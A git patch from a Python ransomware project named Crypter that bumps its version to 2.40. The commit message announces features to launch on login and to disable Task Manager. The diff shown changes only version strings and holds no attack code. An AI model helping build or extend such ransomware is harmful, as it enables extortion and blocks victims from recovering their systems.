From 7d6b4dbbb76bb98ce1feed9c16fe26f2ffdf74c9 Mon Sep 17 00:00:00 2001 From: Sithis Date: Sat, 9 Dec 2017 00:36:10 +0000 Subject: [PATCH] CRYPTER 2.40 - Added option to launch the GUI on login - Added option to disable Task Manager on launch - Minor fixes and adjustments --- Crypter/Main.py | 2 +- build/ExeBuilder/Base.py | 2 +- build/ExeBuilder/__init__.py | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/Crypter/Main.py b/Crypter/Main.py index c9efcc4..b436d68 100644 --- a/Crypter/Main.py +++ b/Crypter/Main.py @@ -1,7 +1,7 @@ ''' @summary: Crypter: Ransomware written entirely in python. @author: MLS -@version: 2.35 +@version: 2.40 ''' # Import libs diff --git a/build/ExeBuilder/Base.py b/build/ExeBuilder/Base.py index 2403744..cbadfcc 100644 --- a/build/ExeBuilder/Base.py +++ b/build/ExeBuilder/Base.py @@ -10,7 +10,7 @@ ## VERSION MAJ_VERSION = "2" -MIN_VERSION = "35" +MIN_VERSION = "40" # TITLE TITLE = "Crypter Builder v%s.%s" % (MAJ_VERSION, MIN_VERSION) diff --git a/build/ExeBuilder/__init__.py b/build/ExeBuilder/__init__.py index 6ddd742..280a901 100644 --- a/build/ExeBuilder/__init__.py +++ b/build/ExeBuilder/__init__.py @@ -1,12 +1,12 @@ ''' @summary: Crypter ExeBuilder(Package): ExeBuilder with GUI for building Crypter ransomware @author: MLS -@version: 2.35 +@version: 2.40 ''' # ABOUT __author__ = "MLS" -__version__ = "2.35" +__version__ = "2.40" __summary__ = "Provides a GUI for building the Crypter ransomware" # Import package modules